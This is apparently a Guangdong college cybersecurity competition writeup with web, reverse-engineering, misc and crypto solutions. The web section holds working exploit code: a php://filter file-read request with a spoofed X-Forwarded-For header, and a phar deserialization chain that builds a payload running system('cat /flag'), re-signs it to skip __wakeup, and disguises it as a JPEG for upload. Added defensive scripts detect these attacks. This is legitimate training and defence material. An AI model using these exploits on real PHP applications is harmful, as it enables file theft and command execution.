Guangdong Provincial College Student Cybersecurity Competition Writeup

001. The vanishing flag

Use the convert (encoding-conversion) filter of the php:// stream wrapper to read the flag.
Use a forwarded-for header to bypass the IP check.

import requests

url = "http://<challenge-host>/"  # placeholder: the challenge address is not given in the writeup
# php://filter with a convert.iconv step reads /flag; the X-Forwarded-For header claims a loopback source
r = requests.get(url, params={"file": "php://filter/convert.iconv.UCS-4.UCS-4/resource=/flag"}, headers={"X-Forwarded-For": "127.0.0.1"})
print(r.text)
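Two weaknesses make this challenge solvable: the IP check reads X-Forwarded-For from an untrusted client, and the file parameter reaches a PHP stream function unfiltered. The script below is an added example (not the challenge's code) showing how a defender would detect both in access logs and how the application should have handled them: the client address only comes from X-Forwarded-For when the TCP peer is a trusted proxy, and the file value is rejected if it carries a wrapper scheme, a php://filter chain or a traversal. The proxy address 10.0.0.2, the simplified log format and the log lines are all constructed for the example.

```python
import ipaddress
import re
from pathlib import PurePosixPath
from urllib.parse import parse_qs, urlsplit

# Assumed address of the reverse proxy in front of the application (constructed for the example).
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.2")}

# Constructed access-log lines: peer address, request line, X-Forwarded-For header ("-" if absent).
SAMPLE_LOG = [
    '203.0.113.5 "GET /index.php?file=php://filter/convert.iconv.UCS-4.UCS-4/resource=/flag HTTP/1.1" xff="127.0.0.1"',
    '203.0.113.5 "GET /index.php?file=about.php HTTP/1.1" xff="-"',
    '10.0.0.2 "GET /index.php?file=../../../../etc/passwd HTTP/1.1" xff="198.51.100.7"',
    '10.0.0.2 "GET /index.php?file=data://text/plain;base64,SGk= HTTP/1.1" xff="127.0.0.1, 198.51.100.7"',
]
LOG_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" xff="([^"]*)"$')
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)


def client_ip(remote_addr, xff):
    """The address an IP check should use. X-Forwarded-For is only honoured when the TCP peer
    is a trusted proxy; a direct client can put anything in that header, including 127.0.0.1."""
    peer = ipaddress.ip_address(remote_addr)
    if peer in TRUSTED_PROXIES and xff and xff != "-":
        # The right-most entry is the one our own proxy appended; entries left of it are unverified.
        return ipaddress.ip_address(xff.split(",")[-1].strip())
    return peer


def is_local_client(remote_addr, xff):
    return client_ip(remote_addr, xff).is_loopback


def file_param_findings(value):
    """Reasons a value must not reach include()/file_get_contents() unfiltered."""
    findings = []
    low = value.lower()
    if WRAPPER_RE.match(value):
        findings.append("stream-wrapper")       # php://, data://, phar://, ...
    if "php://filter" in low:
        findings.append("php-filter")
    if "convert." in low:
        findings.append("filter-chain")         # convert.iconv / convert.base64-* transforms
    if ".." in PurePosixPath(value).parts:
        findings.append("traversal")
    return findings


def safe_resolve(base_dir, value):
    """Hardened lookup: a relative name inside base_dir, no wrapper scheme, no traversal."""
    if file_param_findings(value) or value.startswith("/"):
        return None
    return str(PurePosixPath(base_dir) / value)


def audit_log(lines=SAMPLE_LOG):
    """One alert list per log line: loopback claims in X-Forwarded-For that the peer cannot
    back up, plus dangerous file= values."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            alerts.append(["unparsed"])
            continue
        peer, _method, target, xff = m.groups()
        found = []
        claims_local = xff != "-" and any(p.strip() == "127.0.0.1" for p in xff.split(","))
        if claims_local and not is_local_client(peer, xff):
            found.append("xff-spoof")
        for value in parse_qs(urlsplit(target).query).get("file", []):
            found.extend(file_param_findings(value))
        alerts.append(found)
    return alerts


if __name__ == "__main__":
    for line, found in zip(SAMPLE_LOG, audit_log()):
        print(found or "ok", "<-", line)
```

The fourth log line shows why the right-most entry matters: the proxy appended the real client, and the 127.0.0.1 the client placed in front of it is still flagged as a spoof.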

003. unserialize_web

Scanning reveals the source code in www.tar.gz. /flag is read through phar deserialization, which requires getting past __wakeup, the keyword filter and the file-extension check. Generate the malicious object and store it in phar.phar:

<?php
// Build the deserialization payload
class File {
    public $val1;
    public $val2;
    public $val3;

    public function __construct() {
        $this->val1 = "val1";
        $this->val2 = "val2";
    }

    public function __destruct() {
        if ($this->val1 === "file" && $this->val2 === "exists") {
            if (preg_match('/^\s*system\s*\(\s*\'cat\s+\/[^;]*\'\s*\);\s*$/', $this->val3)) {
                eval($this->val3);
            } else {
                echo "Access Denied";
            }
        }
    }

    public function __access() {
        $Var = "Access Denied";
        echo $Var;
    }

    public function __wakeup() {
        $this->val1 = "exists";
        $this->val2 = "file";
        echo "文件存在";
    }
}

$o = new File();
$o->val1='file';
$o->val2='exists';
$o->val3="system('cat /flag');";

// Open the phar file
@unlink("phar.phar");
$phar = new Phar("phar.phar"); // the extension must be .phar when the archive is generated
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");

// Store the object
$phar->setMetadata($o);

// Add a file to the archive (its content is "test")
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
echo 'use phar.phar';
?>

Modify phar.phar to bypass __wakeup:

import hashlib

def sha1_hash(s):
    sha1_obj = hashlib.sha1()
    sha1_obj.update(s)
    return sha1_obj.digest()

with open("php_docker/phar.phar", "rb") as f:
    content = f.read()
print(content)
# Bump the declared property count (3 -> 4) so that __wakeup is skipped on unserialize
content = content.replace(b'"File":3', b'"File":4')
# Recompute the signature: the last 28 bytes are the 20-byte SHA1 digest plus an 8-byte trailer
content = content[:-28] + sha1_hash(content[:-28]) + content[-8:]
print(content)

with open("php_docker/modified.phar", "wb") as out:
    out.write(content)

Compress it with gzip -f modified.phar to bypass the keyword filter, giving modified.phar.gz; rename that to mod3.jpg to bypass the file-extension check and upload it. Finally trigger it and get the flag:

import requests

url = "http://1c300fa3-159a-bef7-2fd1-6e7839227374b834.tq.jxsec.cn:30486/download.php"
r = requests.post(url, data={"file": "phar://upload/mod3.jpg/test.jpg"})
r.encoding = r.apparent_encoding
print(r.text)
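The three tricks in this solution are a property-count bump in the serialized metadata, a re-signed SHA1 trailer, and a gzip wrapper that hides the serialized text from a keyword filter. The inspector below is an added example, not the challenge's or the writeup's code: it shows what a defender checking uploaded archives can verify instead of grepping for keywords. It decompresses a gzip-wrapped phar, recomputes the SHA1 trailer the same way the modification script above does, and parses the manifest metadata with a small PHP-serialization parser so that a declared property count that differs from the number of properties actually present is reported. build_phar and SAMPLE_META only construct a minimal test archive for the demo (a manifest with no file entries); they are not how the phar extension writes archives.

```python
import gzip
import hashlib
import re
import struct

# Phar trailer: 20-byte SHA1 digest, 4-byte signature type (2 = SHA1), 4-byte magic "GBMB".
SIG_SHA1 = 2
STUB = b"<?php __HALT_COMPILER(); ?>\r\n"
HALT_RE = re.compile(rb"__HALT_COMPILER\(\);(?: \?>)?(?:\r\n|\n)?")
# Constructed metadata: a File object that declares 3 properties and carries exactly 3.
SAMPLE_META = b'O:4:"File":3:{s:4:"val1";s:4:"val1";s:4:"val2";s:4:"val2";s:4:"val3";N;}'


def build_phar(metadata):
    """Constructed minimal archive for the demo: stub, a manifest with zero file entries
    that carries `metadata`, and a SHA1 trailer. Real archives also hold per-file entries."""
    manifest = struct.pack("<IHII", 0, 0x1100, 0x00010000, 0)  # file count, API 1.1.0, flags, alias length
    manifest += struct.pack("<I", len(metadata)) + metadata
    body = STUB + struct.pack("<I", len(manifest)) + manifest
    return body + hashlib.sha1(body).digest() + struct.pack("<I", SIG_SHA1) + b"GBMB"


def resign(data):
    """Recompute the trailer after editing the archive; the digest covers everything before it."""
    return data[:-28] + hashlib.sha1(data[:-28]).digest() + data[-8:]


def parse_php(buf, pos=0):
    """Parse one PHP-serialized value at `pos` (types N, b, i, d, s, a, O); return (value, next_pos).
    Objects come back as dicts so the declared property count can be compared with what is present."""
    t = buf[pos:pos + 1]
    if t == b"N":
        return None, pos + 2
    if t in (b"b", b"i", b"d"):
        end = buf.index(b";", pos)
        raw = buf[pos + 2:end]
        return (float(raw) if t == b"d" else int(raw)), end + 1
    if t == b"s":
        colon = buf.index(b":", pos + 2)
        length = int(buf[pos + 2:colon])
        start = colon + 2                                  # skip ':"'
        return buf[start:start + length].decode("latin-1"), start + length + 2  # skip '";'
    if t in (b"a", b"O"):
        colon = buf.index(b":", pos + 2)
        n = int(buf[pos + 2:colon])
        if t == b"O":
            name = buf[colon + 2:colon + 2 + n].decode()
            cstart = colon + 4 + n                         # skip '":'
            ccolon = buf.index(b":", cstart)
            declared, p = int(buf[cstart:ccolon]), ccolon + 2  # skip ':{'
        else:
            declared, p = n, colon + 2
        members = {}
        while buf[p:p + 1] != b"}":                        # count what is really there, not what is claimed
            key, p = parse_php(buf, p)
            val, p = parse_php(buf, p)
            members[key] = val
        if t == b"O":
            return {"class": name, "declared": declared, "props": members}, p + 1
        return members, p + 1
    raise ValueError(f"unsupported serialized type {t!r} at offset {pos}")


def inspect_phar(data):
    """Verify the SHA1 trailer and flag a manifest object whose declared property count differs
    from the number serialized. Gzip-wrapped input is decompressed first, as phar:// does."""
    if data[:2] == b"\x1f\x8b":
        data = gzip.decompress(data)
    sig_type, magic = struct.unpack("<I4s", data[-8:])
    if magic != b"GBMB" or sig_type != SIG_SHA1:
        raise ValueError("not a SHA1-signed phar")
    halt = HALT_RE.search(data)
    if halt is None:
        raise ValueError("no __HALT_COMPILER stub")
    m_start = halt.end() + 4                               # skip the 4-byte manifest length
    _files, _api, _flags, alias_len = struct.unpack_from("<IHII", data, m_start)
    meta_pos = m_start + 14 + alias_len
    (meta_len,) = struct.unpack_from("<I", data, meta_pos)
    metadata = data[meta_pos + 4:meta_pos + 4 + meta_len]
    result = {"signature_ok": hashlib.sha1(data[:-28]).digest() == data[-28:-8],
              "object": None, "count_mismatch": False}
    if metadata:
        obj, _ = parse_php(metadata)
        if isinstance(obj, dict) and "class" in obj:
            result["object"] = obj["class"]
            result["count_mismatch"] = obj["declared"] != len(obj["props"])
    return result


def demo():
    """Clean archive, then "File":3 bumped to "File":4: unsigned, re-signed, and gzip-wrapped."""
    clean = build_phar(SAMPLE_META)
    bumped = clean.replace(b'"File":3', b'"File":4')
    return {"clean": inspect_phar(clean),
            "bumped_unsigned": inspect_phar(bumped),
            "bumped_resigned": inspect_phar(resign(bumped)),
            "bumped_gzipped": inspect_phar(gzip.compress(resign(bumped)))}


if __name__ == "__main__":
    for label, r in demo().items():
        print(f"{label:16} signature_ok={r['signature_ok']} object={r['object']} count_mismatch={r['count_mismatch']}")
```

The re-signed and gzip-wrapped variants pass the signature check, which is why a valid trailer alone proves nothing about the metadata; the property-count comparison is what catches the edit.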

Reverse

002. re2

Looking at the main function in IDA:

sub_401170("you win: please the key decrypt flag.\r\n");
sub_401170("flag:uQBF11zD6uYP9kJhRhL8OeesPaaZQQvbl3wx7Ik0T6g=. alg=AES\r\n");

The findcrypt plugin identifies CRC32.

Recover the key from CRC32 and the algorithm:

rand1-key:28672 12779520 1744830464 129 13824
rand2-key:2 9 10 14 5


Dump the 16 bytes from memory to obtain the real key. Base64-decode to get the flag.


misc

001. Guess


The archive is password-protected, and the file name looks like an MD5 hash: https://www.cmd5.com/. Looking up the attachment's file name as an MD5 gives the password: a1478520.


Open it in 010 Editor and repair the PNG file header to obtain a QR code. Scanning it leads to a website:


❀❁❀❇❀✼❀❂✿❆✿✽❁❀✿✾❂❅✿❄❂❉❀✿❂❆❀❃❀✿❂❆✿❀❁✾✻✿❁❁❀❁❂❊✻❂✿❈=

This is the flower cipher; decode it online at https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=huaduo


This gives flag{rUsJyNdKhdKuS4VfO7}.

Crypto

001. encipher

from Crypto.Util.number import long_to_bytes
from Crypto.Util.strxor import strxor

d = 4885628697024674802233453512637565599092248491488767824821990279922756927662223348312748794983451796542248787267207054348962258716585568185354414099671493917947012747791554070655258925730967322717771647407982984792632771150018212620323323635510053326184087327891569331050475507897640403090397521797022070233
N = 89714050971394259600440975863751229102748301873549839432714703551498380713981264101533375672970154214062583012365073892089644031804109941766201243163398926438698369735588338279544152140859123834763870759757751944228350552806429642516747541162527058800402619575257179607422628877017180197777983487523142664487
ciphertext = 67254133265602132458415338912590207677514059205474875492945840960242620760650527587490927820914970400738307536068560894182603885331513473363314148815933001614692570010664750071300871546575845539616570277302220914885734071483970427419582877989670767595897758329863040523037547687185382294469780732905652150451

# RSA decryption with the given private exponent, then XOR with the fixed key
# truncated to the length of the recovered message
m = pow(ciphertext, d, N)
m = long_to_bytes(m)
l = len(m)
key = b'Life is like an ocean only strong-minded can reach the other shore'
key = key[:l]
m = strxor(m, key)

print(m, l)

This gives flag{1s_Pa33w0rd_1y2u22}
